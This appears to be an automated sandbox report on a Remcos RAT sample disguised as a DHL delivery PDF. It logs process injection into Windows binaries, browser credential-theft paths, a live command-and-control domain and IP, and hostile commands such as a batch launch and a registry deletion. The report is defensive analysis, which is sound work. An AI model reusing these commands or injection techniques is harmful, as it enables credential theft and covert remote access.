              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3010000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3020000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3030000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3040000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3050000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3060000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3070000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 2F50000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 2F60000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 2F70000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3200000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3210000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3220000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3230000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3240000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3250000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3260000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3270000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 50600000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3280000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3290000
              Allocates memory in foreign processesShow sources
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C60000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C70000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C80000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D10000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D20000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D30000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D40000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D50000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D60000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D70000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D80000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D90000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DA0000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D30000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D40000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D50000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DE0000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DF0000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3000000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3010000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3020000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3030000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3040000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3050000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3060000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3070000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 50600000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F50000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F60000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F70000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3200000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3210000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3220000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3230000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3240000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3250000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3260000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3270000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3280000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3290000 protect: page execute and read and write
              Creates a thread in another existing process (thread injection)Show sources
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2C80000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D40000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D80000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2DA0000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D50000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3010000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3050000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3070000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 2F70000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3230000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3270000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3290000
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00414923 StrToIntA,mouse_event,
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoA,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F2AB cpuid
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004410D3 GetSystemTimeAsFileTime,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044190C _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004166F6 GetComputerNameExW,GetUserNameW,

              Stealing of Sensitive Information:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookiesShow sources
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \key3.db
              Contains functionality to steal Chrome passwords or cookiesShow sources
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

              Remote Access Functionality:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
              Detected Remcos RATShow sources
              Source: mobsync.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: mobsync.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: secinit.exe, 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
              Source: secinit.exe, 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: cmd.exe

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsNative API1Registry Run Keys / Startup Folder1Access Token Manipulation1Scripting1Input Capture11Account Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Process Injection322Obfuscated Files or Information2Credentials In Files2File and Directory Discovery2SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Masquerading11NTDSSystem Information Discovery33Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptModify Registry1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsSecurity Software Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol21Jamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection322Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491719 Sample: ENTREGA DE DOCUMENTOS DHL _... Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 44 ongod4ever.ddns.net 2->44 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->68 70 6 other signatures 2->70 9 ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe 1 22 2->9         started        14 Iqzenco.exe 15 2->14         started        16 Iqzenco.exe 15 2->16         started        signatures3 process4 dnsIp5 50 sn-files.fe.1drv.com 9->50 52 onedrive.live.com 9->52 54 bl30uw.sn.files.1drv.com 9->54 42 C:\Users\Public\Libraries\...\Iqzenco.exe, PE32 9->42 dropped 78 Writes to foreign memory regions 9->78 80 Allocates memory in foreign processes 9->80 82 Creates a thread in another existing process (thread injection) 9->82 18 mobsync.exe 2 9->18         started        22 cmd.exe 1 9->22         started        24 cmd.exe 1 9->24         started        56 sn-files.fe.1drv.com 14->56 60 2 other IPs or domains 14->60 84 Multi AV Scanner detection for dropped file 14->84 26 mobsync.exe 14->26         started        58 sn-files.fe.1drv.com 16->58 62 2 other IPs or domains 16->62 28 secinit.exe 16->28         started        file6 signatures7 process8 dnsIp9 46 ongod4ever.ddns.net 185.140.53.15, 49771, 49774, 49775 DAVID_CRAIGGG Sweden 18->46 48 192.168.2.1 unknown unknown 18->48 72 Contains functionality to steal Chrome passwords or cookies 18->72 74 Contains functionality to steal Firefox passwords or cookies 18->74 76 Delayed program exit found 18->76 30 reg.exe 1 22->30         started        32 conhost.exe 22->32         started        34 cmd.exe 1 24->34         started        36 conhost.exe 24->36         started        signatures10 process11 process12 38 conhost.exe 30->38         started        40 conhost.exe 34->40         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe26%VirustotalBrowse
              ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe24%ReversingLabsWin32.Backdoor.Remcos

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe24%ReversingLabsWin32.Backdoor.Remcos

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              0.0.ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              18.0.Iqzenco.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
